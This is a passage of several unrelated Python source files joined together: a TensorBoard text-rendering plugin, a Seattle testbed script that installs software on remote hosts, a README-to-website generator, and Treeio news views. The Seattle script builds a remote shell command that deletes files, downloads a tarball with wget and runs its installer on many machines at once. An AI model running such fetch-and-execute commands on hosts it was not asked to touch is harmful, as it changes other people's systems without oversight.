    A two-dimensional subarray from the input array.

  Raises:
    ValueError: If the argument is not a numpy ndarray, or the dimensionality
      is too low.
  """
  if not isinstance(arr, np.ndarray):
    raise ValueError('reduce_to_2d requires a numpy.ndarray')
  ndims = len(arr.shape)
  if ndims < 2:
    raise ValueError('reduce_to_2d requires an array of dimensionality >=2')
  # slice(None) is equivalent to `:`, so this takes arr[0,0,...0,:,:]
  slices = ([0] * (ndims - 2)) + [slice(None), slice(None)]
  # BUG FIX: indexing with a *list* of slices was deprecated in numpy 1.15
  # and is an error in modern numpy; a tuple performs the intended basic
  # indexing.
  return arr[tuple(slices)]
def text_array_to_html(text_arr):
  """Take a numpy.ndarray containing strings, and convert it into html.

  If the ndarray contains a single scalar string, that string is converted to
  html via our sanitized markdown parser. If it contains an array of strings,
  the strings are individually converted to html and then composed into a table
  using make_table. If the array contains dimensionality greater than 2,
  all but two of the dimensions are removed, and a warning message is prefixed
  to the table.

  Args:
    text_arr: A numpy.ndarray containing strings.

  Returns:
    The array converted to html.
  """
  if not text_arr.shape:
    # It is a scalar. No need to put it in a table, just apply markdown
    # NOTE(review): .tostring() on a str-dtype scalar array -- presumably
    # yields the raw string bytes here; .tostring() is deprecated in favor
    # of .tobytes() in modern numpy. Confirm against the numpy/tf versions
    # this plugin pins.
    return plugin_util.markdown_to_safe_html(
        text_arr.astype(np.dtype(str)).tostring())
  warning = ''
  if len(text_arr.shape) > 2:
    # Too many dimensions to render: warn the user, then slice down to 2d.
    warning = plugin_util.markdown_to_safe_html(WARNING_TEMPLATE
                                                % len(text_arr.shape))
    text_arr = reduce_to_2d(text_arr)
  # Sanitize each cell individually, then restore the original shape so the
  # table layout matches the input array.
  html_arr = [plugin_util.markdown_to_safe_html(x)
              for x in text_arr.reshape(-1)]
  html_arr = np.array(html_arr).reshape(text_arr.shape)
  return warning + make_table(html_arr)
def process_string_tensor_event(event):
  """Convert a TensorEvent into a JSON-compatible response."""
  # Decode the proto into an ndarray of strings, then render it as
  # sanitized HTML (a table for non-scalar arrays).
  string_arr = tf.make_ndarray(event.tensor_proto)
  return {
      'wall_time': event.wall_time,
      'step': event.step,
      'text': text_array_to_html(string_arr),
  }
class TextPlugin(base_plugin.TBPlugin):
  """Text Plugin for TensorBoard."""

  plugin_name = metadata.PLUGIN_NAME

  def __init__(self, context):
    """Instantiates TextPlugin via TensorBoard core.

    Args:
      context: A base_plugin.TBContext instance.
    """
    self._multiplexer = context.multiplexer

  def index_impl(self):
    """Returns a dict mapping each run name to a list of its text tags."""
    # Legacy path: an earlier system stored text-summary tags inside
    # tensors.json plugin assets; keep supporting those files.
    asset_name = 'tensorboard_text'
    run_to_series = collections.defaultdict(list)
    for run, assets in self._multiplexer.PluginAssets(asset_name).items():
      if 'tensors.json' not in assets:
        run_to_series[run] = []
        continue
      tensors_json = self._multiplexer.RetrievePluginAsset(
          run, asset_name, 'tensors.json')
      run_to_series[run] = json.loads(tensors_json)
    # Current path: summaries recorded via SummaryMetadata on Value protos.
    # These augment the legacy entries; on conflict the new method wins.
    content_mapping = self._multiplexer.PluginRunToTagToContent(
        metadata.PLUGIN_NAME)
    for run, tags in content_mapping.items():
      run_to_series[run] += tags.keys()
    return run_to_series

  @wrappers.Request.application
  def tags_route(self, request):
    """Serves the run -> tag-listing map as JSON."""
    response = dict(self.index_impl())
    return http_util.Respond(request, response, 'application/json')

  def text_impl(self, run, tag):
    """Returns the JSON-compatible text events for run/tag ([] if absent)."""
    try:
      text_events = self._multiplexer.Tensors(run, tag)
    except KeyError:
      text_events = []
    return [process_string_tensor_event(ev) for ev in text_events]

  @wrappers.Request.application
  def text_route(self, request):
    """Serves the text data for the requested run/tag as JSON."""
    run = request.args.get('run')
    tag = request.args.get('tag')
    return http_util.Respond(
        request, self.text_impl(run, tag), 'application/json')

  def get_plugin_apps(self):
    """Maps HTTP routes to their werkzeug request handlers."""
    return {
        TAGS_ROUTE: self.tags_route,
        TEXT_ROUTE: self.text_route,
    }

  def is_active(self):
    """Determines whether this plugin is active.

    This plugin is only active if TensorBoard sampled any text summaries.

    Returns:
      Whether this plugin is active.
    """
    return bool(self._multiplexer and any(self.index_impl().values()))
| |
"""
<Program Name>
missing_seattle_install_p.py
<Started>
June 2009
<Author>
n2k8000@u.washington.edu
Konstantin Pik
<Purpose>
This file will read in a list file passed into it, and from that list it
will install seattle on all of those nodes. The list file is to be in the
file format specified for .LIST files (!user:[username], followed by list of
IPs).
<Usage>
python missing_seattle_install.py missing.list
Note: missing.list is the default file name.
"""
import thread
import time
import sys
# for remote_shellexec
import deploy_network
import deploy_threading
import parallelize_repy
# the running thread counter
thread_counter = 0
# the lock on the thread_counter, just to make sure add/sub is atomic
thread_lock = thread.allocate_lock()
def get_remote_hosts_from_file(fname = 'missing.list'):
  """
  <Purpose>
    Returns a list of the IP as read from file specified.

    File format is:
    !user:[username]
    [IPs]

    [username] is the username that will be used until a new $username is
    specified in the same format. NOTE: Username is case sensitive.
    [IPs] are a list of IPs/hostname (one per line) associated with that
    username

  <Arguments>
    fname:
      Optional. The filename containing the IPs of the remote machines. File
      must be in the same directory as this script.

  <Exceptions>
    Catches a thrown exception if the IP file is not found.

  <Side Effects>
    None.

  <Returns>
    Returns a list of tuples with (username, ip) on success, False on failure
  """
  # IP file must be in the same dir as this script
  try:
    file_of_ips = open(fname, 'r')
  except Exception as e:
    # BUG FIX: the original called file_of_ips.close() here, but when open()
    # raises, file_of_ips was never bound -- so this path crashed with a
    # NameError instead of reporting the problem and returning False.
    print('Error: Are you missing your list of remote hosts? ('+str(e)+')')
    return False
  # flag on whether we have any remote hosts (there are users, and comments
  # in the file as well)
  have_one_ip = False
  # list of (username, host) tuples collected from the file
  users_ip_tuple_list = []
  current_username = ''
  # Python docs suggest doing this instead of reading in whole file into mem:
  for line in file_of_ips:
    # if first chars match what we want ('!user:' is 6 chars long)
    if line[0:6].lower() == '!user:':
      # grab everything after the '!user:' string; strip() drops the newline
      # and surrounding spaces. (The old [6:-1] slice silently ate the last
      # character of the username on a final line with no trailing newline.)
      current_username = line[6:].strip()
    else:
      # ignore blank lines and spaces
      if line.strip('\n '):
        # and ignore comments (lines starting with #)
        if line.strip('\n ')[0] != '#':
          # if we get here, then we have an IP so we need to check that
          # user is not empty.. log err if it is and complain.
          if not current_username:
            print('Critical Error: No username specified for remote host group!')
            file_of_ips.close()
            return False
          # add (username, remote_host) pair
          users_ip_tuple_list.append((current_username, line.rstrip('\n ')))
          # set flag that we have at least one ip
          have_one_ip = True
  file_of_ips.close()
  # return true only if we have at least ONE ip that we added to the list
  # and not just a bunch of users
  if have_one_ip:
    # lets make the list a set, which is a cheap way of getting rid of
    # duplicates, then cast back to list.
    finalized_list = list(set(users_ip_tuple_list))
    print("Found "+str(len(finalized_list))+" unique hosts to connect to.")
    return finalized_list
  return False
def format_print(out, err):
  """
  <Purpose>
    Strips surrounding whitespace from the stdout/stderr strings, then
    prints each non-empty one and appends it to missing.log.

  <Arguments>
    out:
      stdout
    err:
      std error

  <Exceptions>
    None.

  <Side Effects>
    Appends to missing.log in the current directory.

  <Returns>
    None.
  """
  try:
    stripped_out = out.strip('\n\r ')
    stripped_err = err.strip('\n\r ')
    log_handle = open('missing.log', 'a')
    if stripped_out:
      print(stripped_out)
      log_handle.write(stripped_out+'\n')
    if stripped_err:
      print(stripped_err)
      log_handle.write(stripped_err+'\n')
    log_handle.close()
  except Exception as e:
    print('Error while writing file and/or formatting data')
    print(e)
  return
def worker(username_host_tuple):
  """
  <Purpose>
    Worker thread that makes calls to remote_shellexec

  <Arguments>
    username_host_tuple:
      username_host_tuple[0] is
        username:
          the username to log in as
      username_host_tuple[1] is
        host:
          the remote hostname/ip to install on.
      NOTE(review): despite the name and the description above, the body
      below treats the whole argument as the host and hardcodes the
      username -- see the comments inline; confirm which contract callers
      (main's parallelize call) actually use.

  <Exceptions>
    None.

  <Side Effects>
    None.

  <Returns>
    None.
  """
  # NOTE(review): deliberately hardcoded; the tuple-unpacking variant is
  # kept as a trailing comment. main() passes bare host strings, not tuples.
  username = 'uw_seattle' #username_host_tuple[0]
  host = username_host_tuple
  # build up a command string that'll download and install seattle
  cmd_list = []
  # 1. Remove old file, and download the file
  cmd_list.append('cd seattle_repy; ./uninstall.sh; cd ~; rm -rf seattle_repy')
  cmd_list.append('rm -rf seattle_linux.tgz')
  cmd_list.append('wget https://seattlegeni.cs.washington.edu/geni/download/flibble/seattle_linux.tgz')
  #cmd_list.append('wget --no-check-certificate https://blackbox.cs.washington.edu/geni/html/tukwila/seattle_linux.tgz')
  # 2. Untar
  cmd_list.append('tar -xf seattle_linux.tgz')
  # 3. Change into seattle_repy directory and execute python install.sh to start seattle
  cmd_list.append('cd seattle_repy; ./install.sh > /dev/null 2> /dev/null < /dev/null&')
  # merge into a command string
  cmd_str = '; '.join(cmd_list)
  # deploy_network is a project module (imported at the top of this file);
  # it runs the command over ssh and returns (stdout, stderr, returncode).
  out, err, retcode = deploy_network.remote_shellexec(cmd_str, username, host)
  format_print(out, err)
def main():
  """
  <Purpose>
    Entry point into the program. Reads the hosts that need installing
    from file and then starts the threads that will take care of downloading
    and installing seattle. Then waits for all threads to finish. This takes
    a while as an RSA key needs to be generated during each install.

  <Arguments>
    None

  <Exceptions>
    Possible exception when launching new threads.

  <Side Effects>
    None.

  <Returns>
    None.
  """
  # start the timeout monitor thread
  deploy_threading.init()
  # the fn of the file that contains the list of nodes we'll be using
  nodelist_fn = ''
  # did we get a parameter passed in? if so that's our fn
  if len(sys.argv) > 1:
    nodelist_fn = sys.argv[1]
    print 'Using '+nodelist_fn+' filename to read in hostnames'
  else:
    print 'Using default missing.list filename to read in hostnames'
  # get hosts from file
  #if nodelist_fn:
  #  hosts = get_remote_hosts_from_file(nodelist_fn)
  #else: # use default fn
  #  hosts = get_remote_hosts_from_file()
  # '128.208.1.130', 128.208.1.217
  # or manually type in hosts here
  # NOTE(review): the file-reading path above is commented out and the list
  # below is empty, so as committed this script does nothing; the filename
  # printed above is read but never used. Presumably hosts were pasted in
  # by hand per run -- confirm intent before re-enabling.
  hosts = [ ]
  # if we have hostnames
  if hosts:
    # BEGIN
    # Fan out: run worker() on every host with up to 10 concurrent workers
    # (parallelize_repy is a project module).
    func_handle = parallelize_repy.parallelize_initfunction(hosts, worker, 10)
    size = str(len(hosts))
    # Poll every 5 seconds and report progress until all workers finish.
    while not parallelize_repy.parallelize_isfunctionfinished(func_handle):
      results_dict = parallelize_repy.parallelize_getresults(func_handle)
      print str(len(results_dict['aborted']))+' aborted, '+str(len(results_dict['exception']))+\
        ' exceptioned, '+str(len(results_dict['returned']))+' finished of '+size+' total.'
      time.sleep(5)
    # stop the timeout monitor started by deploy_threading.init()
    deploy_threading.destroy()
    # END
# Standard entry-point guard: run only when executed directly, not on import.
if __name__ == "__main__":
  main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Jan-Philip Gehrcke (http://gehrcke.de).
# See LICENSE file for details.
"""beautiful-readme.
"""
from __future__ import unicode_literals
import os
import re
import sys
import shutil
import urllib
import logging
import argparse
from collections import OrderedDict
from subprocess import Popen, PIPE
try:
import HTMLParser as htmlparser
except ImportError:
import html.parser as htmlparser
# Module-wide logger: root logger at DEBUG with a stream handler that
# prints a compact timestamp, the level, and the message.
log = logging.getLogger()
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
formatter = logging.Formatter(
    '%(asctime)s,%(msecs)-6.1f - %(levelname)s: %(message)s',
    datefmt='%H:%M:%S')
ch.setFormatter(formatter)
log.addHandler(ch)
try:
    import jinja2
except ImportError:
    # BUG FIX: the original called err() here, but err() is defined much
    # later in this module and is not yet bound when this import-time check
    # runs -- so a missing jinja2 raised a NameError that masked the real
    # problem. Log and exit directly (log is configured above).
    log.error("Missing dependency: cannot import jinja2.")
    sys.exit(1)
__version__ = "0.1.0"
# To be populated by argparse from cmdline arguments.
cmdlineopts = None
# To be populated when executing the config file (see exec_config_file).
config = {}
def main():
    """Build a single-page HTML site from a README file.

    Pipeline: parse CLI options, execute the user config, convert the
    README (markdown or docutils), filter the HTML body, build a TOC,
    render the Jinja2 template, and write build/index.html plus the static
    resources.
    """
    # These module-level names are (re)bound below via the local imports.
    global markdown
    global docutils
    # NOTE(review): the module global is named `config`, not `conf`; this
    # declaration looks stale and has no effect -- confirm and remove.
    global conf
    # parse_options() is defined elsewhere in this file; it populates the
    # module-level `cmdlineopts`.
    parse_options()
    resdir = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), "resources")
    log.debug("Identified resource dir: %s", resdir)
    if not os.path.isdir(resdir):
        err("Cannot access identified resource dir: %s" % resdir)
    log.info("Read config.")
    # exec_config_file() (defined elsewhere in this file) populates the
    # module-level `config` dict used throughout.
    exec_config_file(cmdlineopts.configfile)
    try:
        if config["converter"] == "markdown":
            log.info("Importing markdown.")
            import markdown
            converter = MarkdownConverter()
        elif config["converter"] == "docutils":
            log.info("Importing docutils.")
            import docutils.core
            converter = DocutilsConverter()
        else:
            err("Config error: converter must be 'markdown' or 'docutils.")
    except ImportError:
        err("Missing dependency: cannort import %s." % config["converter"])
    # (Re-)create build directory.
    log.info("Create build directory.")
    if os.path.isdir(config["builddir"]):
        log.info("Purge previously existing build directory: %s",
            config["builddir"])
        shutil.rmtree(config["builddir"])
    os.mkdir(config["builddir"])
    # TODO: only do this if necessary (i.e. if CSS/JS resources required).
    log.info("Copy static files to build dir.")
    shutil.copytree(
        os.path.join(resdir, "static"),
        os.path.join(config["builddir"], "static"))
    jinjaenv = jinja2.Environment(
        loader=jinja2.FileSystemLoader(searchpath=resdir),
        trim_blocks=False)
    # Read basic HTML scaffold.
    log.info("Read HTML template from %s", "index.html.tpl")
    htmltemplate = jinjaenv.get_template("index.html.tpl")
    sourceenc = "utf-8"
    log.info("Read %s, decode with %s codec.",
        cmdlineopts.readmefile, sourceenc)
    if not os.path.isfile(cmdlineopts.readmefile):
        err("Cannot find file: %s" % cmdlineopts.readmefile)
    with open(cmdlineopts.readmefile, "rb") as f:
        bodysource = f.read().decode(sourceenc)
    log.info("Create document body: convert source to HTML.")
    htmlbody = converter.process(bodysource)
    # Filter body.
    # NOTE(review): only the markdown title filter is applied here; the
    # docutils title is presumably handled elsewhere -- confirm.
    bodyfilter = []
    if config["converter"] == "markdown":
        bodyfilter.append(MarkdownTitleFilter())
    for bfilter in bodyfilter:
        htmlbody = bfilter.process(htmlbody)
    # Modify body on the fly (populate h2 tags with ids).
    # Generate Table Of Contents HTML code on the fly.
    # auto_toc_from_h2() is defined elsewhere in this file.
    htmlbody, toc = auto_toc_from_h2(htmlbody)
    sidebar = config["sidebar"]
    # Just don't include TOC HTML if not desired (modified h2 tags are still
    # convenient).
    if config["sidebar_toc"]:
        log.info("Prepare sidebar TOC inclusion.")
        sidebar = "%s\n%s" % (sidebar, toc)
    else:
        log.info("Do not include sidebar TOC.")
    # Create HTML document: fill basic HTML template.
    log.info("Create main HTML document (fill template).")
    template_mapping = {
        "title": config["title"],
        "description": config["description"],
        "body": htmlbody,
        "about": config["about"],
        "copyright": config["copyright"],
        "sidebar": sidebar,
        "google_analytics_id": config["google_analytics_id"],
        "customcss": config["customcss"],
        "attribution": config["attribution"],
    }
    htmlout = htmltemplate.render(**template_mapping)
    # Write HTML document.
    indexhtmlpath = os.path.join(config["builddir"], "index.html")
    log.info("Write %s.", indexhtmlpath)
    with open(indexhtmlpath, "wb") as f:
        f.write(htmlout.encode("utf-8"))
def err(msg):
    """Log *msg* at ERROR level and abort the program with exit status 1."""
    log.error(msg)
    sys.exit(1)
class Converter(object):
    """Base class for source-to-HTML converters; subclasses implement
    process(doc)."""
    def __init__(self):
        pass
class DocutilsConverter(Converter):
    """Convert reStructuredText source to an HTML body fragment via docutils.

    See http://docutils.sourceforge.net/docs/api/publisher.html
    """
    def process(self, doc):
        """Return the HTML fragment for the unicode RST source `doc`."""
        return self._html_fragment(doc)

    def _html_fragment(self, doc):
        """
        Return 'fragment' part of docutils HTML document. `doc` is unicode RST
        source.

        Largely copied from
        http://docutils.sourceforge.net/docutils/examples.py

        Settings used below:
        - `input_encoding`: "unicode" because `doc` is already a unicode
          string (no byte decoding needed).
        - `doctitle_xform`: promote a lone top-level section title to the
          document title (and a subsequent one to the subtitle).
        - `initial_header_level`: start header elements at <h2>, so the
          page's own <h1> title is not duplicated.
        """
        settings = {
            'input_encoding': "unicode",
            'doctitle_xform': True,
            'initial_header_level': 2
        }
        parts = docutils.core.publish_parts(
            source=doc,
            source_path=None,
            destination_path=None,
            writer_name='html',
            settings_overrides=settings)
        # "parts['fragment'] contains the document body (not the HTML <body>).
        # In other words, it contains the entire document, less the document
        # title, subtitle, docinfo, header, and footer."
        return parts["fragment"]
class MarkdownConverter(Converter):
    """Convert Markdown source to HTML5 with the `markdown` package.

    Reference: https://pythonhosted.org/Markdown/reference.html
    """

    def process(self, doc):
        """Return the HTML5 rendering of the Markdown string *doc*."""
        html = markdown.markdown(text=doc, output_format="html5")
        return html
class BodyFilterError(Exception):
    """Raised for any kind of problem during body filtering."""
class BodyFilter(object):
    """Base class for filters that modify the HTML body produced by
    rst2html or markdown.

    Subclasses implement `_process`; callers invoke `process`, which
    wraps the actual filtering with validation and debug logging.
    """

    def __init__(self):
        pass

    def process(self, body):
        """Run this filter on *body* and return the filtered HTML.

        Raises BodyFilterError when *body* is empty.
        """
        if not body:
            raise BodyFilterError("body is empty: %s" % body)
        log.debug("Body is about to be filtered by %s.", self.__class__.__name__)
        log.debug("Prefilter body length: %s", len(body))
        filtered = self._process(body)
        log.debug("Filter done. Postfilter body length: %s", len(filtered))
        return filtered
class DocutilsTitleFilter(BodyFilter):
    """Strip the docutils-generated title from the first line of the body.

    This program adds its own document title; if docutils also adds one
    (<h1 class="title">...</h1>), it would appear twice. RegEx is fine
    here although we're filtering HTML: the input is not arbitrary HTML
    but exactly what docutils emits, and the title is always the first
    tag on the first line.
    """

    def _process(self, body):
        """Return *body* without a leading docutils title line.

        Raises BodyFilterError when the first line contains an h1 that
        does not match the expected docutils title pattern.
        """
        bodylines = body.splitlines()
        first = bodylines[0]
        # Idiom fix: "x not in y" instead of "not x in y".
        if "h1" not in first:
            log.info("No h1 in first line of body. Skip.")
            return body
        match = re.search('<h1 class="title">.*</h1>', first)
        if not match:
            raise BodyFilterError("First line contains h1, but does not match pattern.")
        log.info('First line contains docutils title (<h1 class="title">...</h1>). Remove.')
        return "\n".join(bodylines[1:])
class MarkdownTitleFilter(BodyFilter):
    """Strip a leading <h1>xxx</h1> title line from markdown output.

    The idea is to remove the heading of highest hierarchy level, which
    is expected to be the document title that beautiful-readme adds
    itself anyway. For docutils input this is solved differently: title
    detection happens inside docutils and the title never reaches the
    HTML fragment.

    TODO/expected problem: if the original README has no clear title --
    all headings on the same hierarchy level, or the first heading
    sharing its level with another -- this filter probably does not make
    sense.
    """

    def _process(self, body):
        """Return *body* without its first line when that line is a title.

        Raises BodyFilterError when the first line contains an h1 that
        does not match the <h1>...</h1> pattern.
        """
        bodylines = body.splitlines()
        first = bodylines[0]
        # Idiom fix: "x not in y" instead of "not x in y".
        if "h1" not in first:
            log.info("No h1 in first line of body. Skip.")
            return body
        match = re.search('<h1>.*</h1>', first)
        if not match:
            raise BodyFilterError(
                "First line contains h1, but does not match pattern.")
        log.info('First line contains title (<h1>...</h1>). Remove.')
        return "\n".join(bodylines[1:])
def heading_to_label(heading):
    """Return an HTML anchor id ("label") derived from *heading*.

    *heading* is the raw text between an opening and closing heading
    tag; it may contain HTML entities.
    """
    log.debug("Convert heading '%r' to anchor id.", heading)
    # Decode HTML entities first so the cleanup below sees real characters.
    unescaped = htmlparser.HTMLParser().unescape(heading)
    log.debug("Unescaped heading: %r", unescaped)
    # Split on whitespace, reduce each token to lowercase alphanumerics,
    # and rejoin with "-". The "brtoc-" prefix keeps ids unique on the
    # page (any random fixed string would do).
    cleantokens = [re.sub('[^0-9a-zA-Z]+', '', tok).lower() for tok in unescaped.split()]
    return "brtoc-" + "-".join(tok for tok in cleantokens if tok)
def auto_toc_from_h2(body):
    """Anchor every <h2> in *body* and build a table of contents for them.

    Returns (body, toc): *body* with each <h2>HEADING</h2> replaced by
    <h2 id="LABEL">HEADING</h2>, and *toc* as a sidebar <div> of links
    to those anchors. Aborts the program when two headings map to the
    same anchor id.
    """
    label_heading_dict = OrderedDict()

    def replace_heading(matchobj):
        # re.sub callback: runs once per <h2>...</h2> occurrence.
        heading = matchobj.group(1)
        label = heading_to_label(heading)
        log.info("Found heading: %r", heading)
        rpl = '<h2 id="%s">%s</h2>' % (label, heading)
        log.info("Replacing with: %r", rpl)
        # Remember the label -> heading mapping for the toc below.
        label_heading_dict[label] = heading
        return rpl

    log.info("Scanning body for <h2>*</h2>, replacing on the fly.")
    body = re.sub("<h2>(.*)</h2>", replace_heading, body)

    # Anchor ids must be unique within the page.
    labels = label_heading_dict.keys()
    if len(set(labels)) != len(labels):
        log.error("Duplicate headline. Must be unique, abort.")
        sys.exit(1)

    listitems = ['<li><a href="#%s">%s</a></li>' % (label, heading)
                 for label, heading in label_heading_dict.items()]
    # Produce some indentation.
    listhtml = " " + "\n ".join(listitems)
    log.debug("Generated the following toc list:\n%s", listhtml)
    # Class "brcontents": the br namespace stands for beautiful-readme.
    prefix = ('<div class="sidebar-module sidebar-module-inset brcontents">\n'
              ' <h4>Contents</h4>\n'
              ' <ol class="list-unstyled">')
    suffix = ' </ol>\n</div>'
    toc = "\n".join([prefix, listhtml, suffix])
    return body, toc
def parse_options():
    """Parse the command line into the module-global `cmdlineopts`."""
    global cmdlineopts
    desc = "Create a simple mobile-friendly static website from your README."
    parser = argparse.ArgumentParser(
        prog="beautiful-readme",
        description=desc,
        epilog="Version %s" % __version__,
        add_help=False,
    )
    # -h is registered manually because add_help is disabled above.
    parser.add_argument(
        "-h", "--help", action="help",
        help="Show help message and exit.")
    parser.add_argument(
        "--version", action="version", version=__version__,
        help="Show version information and exit.")
    parser.add_argument(
        "-c", "--configfile", action="store", default="brconfig.py",
        help="Path to configuration file.")
    parser.add_argument(
        "readmefile", action="store", metavar="README",
        help=("Path to a README file (reStructuredText or Markdown). Expected "
              "encoding: UTF-8."))
    cmdlineopts = parser.parse_args()
def exec_config_file(cfgfilepath):
    """Execute the Python configuration file into the global `config` dict.

    Aborts the program (via `err`) when *cfgfilepath* does not exist.

    References:
    http://stackoverflow.com/a/6357418/145400
    http://stackoverflow.com/a/8226090/145400
    https://bitbucket.org/birkenfeld/sphinx/src/1.2.2/sphinx/util/pycompat.py
    """
    if not os.path.isfile(cfgfilepath):
        err("Cannot access configuration file: %s." % cfgfilepath)
    global config
    if sys.version < '3':
        # Python 2: execfile() reads and executes the file directly.
        execfile(cfgfilepath, config)
    else:
        # Python 3: read, compile, then exec. The context manager closes
        # the file handle (the original `open(...).read()` leaked it).
        with open(cfgfilepath, "rb") as f:
            code = compile(f.read(), cfgfilepath, 'exec')
        exec(code, config)
# Script entry point.
if __name__ == "__main__":
    main()
| |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
News module: views
"""
from django.shortcuts import Http404
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from django.db.models import Q
from treeio.core.models import UpdateRecord, Module, Object, Widget
from treeio.core.rendering import render_to_response
from treeio.core.decorators import treeio_login_required, handle_response_format
from treeio.news.forms import UpdateRecordForm, UpdateRecordFilterForm
from treeio.core.rss import ObjectFeed
def _get_default_context(request):
    """Preprocess context: visible modules plus the news filter form."""
    # Hide the 'account' and 'news' modules from the module list.
    excluded = Q(name__icontains='account') | Q(name__icontains='news')
    modules = request.user.profile.get_perspective().get_modules().exclude(excluded)
    filters = UpdateRecordFilterForm(request.user.profile, request.GET)
    return {'modules': modules, 'filters': filters}
def _get_filter_query(user, do_permissions=True, do_recipients=True, filters=None):
    """Build a Q object selecting the UpdateRecords visible to *user*.

    - `filters`: request GET dict; every key that names an UpdateRecord
      field filters on that field's id.
    - `do_permissions`: restrict to records whose 'about' objects the
      user may access (skipped for admins).
    - `do_recipients`: additionally restrict by recipient lists.
    """
    if filters is None:
        filters = {}
    is_admin = user.is_admin()
    query = Q()
    # Turn each submitted filter value into a <field>__id lookup.
    for arg in filters:
        if hasattr(UpdateRecord, arg) and filters[arg]:
            kwargs = {str(arg + '__id'): long(filters[arg])}  # long(): Python 2 code
            query = query & Q(**kwargs)
    if do_permissions and not is_admin:
        # NOTE(review): this assignment replaces the filter query built
        # above instead of AND-ing with it -- confirm that is intended.
        query = Q(about__isnull=True) | Q(about__full_access=user) | Q(
            about__full_access__isnull=True)
        query = query | Q(about__full_access=user.default_group) | Q(
            about__full_access__in=user.other_groups.all())
        query = query | Q(about__read_access=user)
        query = query | Q(about__read_access=user.default_group) | Q(
            about__read_access__in=user.other_groups.all())
        # Limit to modules in the user's perspective, unless the user can
        # see every module anyway.
        modules = Object.filter_permitted(
            user, user.get_perspective().get_modules())
        if not len(modules) == Module.objects.all().count():
            modquery = Q()
            for module in modules:
                modquery = modquery | Q(
                    about__object_type__contains=module.name)
            query = query & modquery
    if do_recipients:
        if not is_admin:
            # Non-admin: hide own non-share records; require that the user
            # (or one of their groups) is a recipient, or that the record
            # has no explicit recipients.
            query = query & ((~Q(author=user) | Q(record_type='share')) & (Q(recipients=user) |
                             Q(recipients__isnull=True) | Q(
                                 recipients=user.default_group) |
                             Q(recipients__in=user.other_groups.all())))
        else:
            # Admin: shares always visible; other authors' records only if
            # addressed to the admin, their groups, or nobody in particular.
            query = query & (Q(record_type='share') | (~Q(author=user) & (Q(recipients=user) |
                             Q(recipients__isnull=True) | Q(
                                 recipients=user.default_group) | Q(recipients__in=user.other_groups.all()))))
    return query
@handle_response_format
@treeio_login_required
def index(request, response_format='html'):
    """All Activity: list visible updates and handle the share form."""
    profile = request.user.profile
    query = _get_filter_query(profile, filters=request.GET)
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('news_index'))
    else:
        form = UpdateRecordForm(user=profile)
    if response_format == 'rss':
        return ObjectFeed(title=_('All Activity'),
                          link=request.path,
                          description=_('Updates on activity in your Tree.io'),
                          objects=updates)(request)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/index', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def index_social(request, response_format='html'):
    """Social Activity: only 'share' records, plus the share form."""
    profile = request.user.profile
    query = _get_filter_query(
        profile, filters=request.GET) & Q(record_type='share')
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('news_social'))
    else:
        form = UpdateRecordForm(user=profile)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/social', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def top_news(request, response_format='html'):
    """Top news: records with a positive score, plus the share form."""
    profile = request.user.profile
    query = _get_filter_query(profile, filters=request.GET) & Q(score__gt=0)
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('news_index'))
    else:
        form = UpdateRecordForm(user=profile)
    if response_format == 'rss':
        return ObjectFeed(title=_('Top News'),
                          link=request.path,
                          description=_('Updates on activity in your Tree.io'),
                          objects=updates)(request)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/top_news', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def my_watchlist(request, response_format='html'):
    """News about all objects the user is subscribed to (excluding own)."""
    profile = request.user.profile
    query = _get_filter_query(profile, do_recipients=False, filters=request.GET) & Q(
        about__in=profile.subscriptions.all()) & ~Q(author=profile)
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save(commit=False)
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('news_index'))
    else:
        form = UpdateRecordForm(user=profile)
    if response_format == 'rss':
        return ObjectFeed(title=_('My Watchlist'),
                          link=request.path,
                          description=_(
                              'Updates on your watchlist in Tree.io'),
                          objects=updates)(request)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/my_watchlist', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def my_activity(request, response_format='html'):
    """Records authored by the current user, plus the share form."""
    profile = request.user.profile
    updates = UpdateRecord.objects.filter(author=profile).distinct()
    if request.POST:
        record = UpdateRecord()
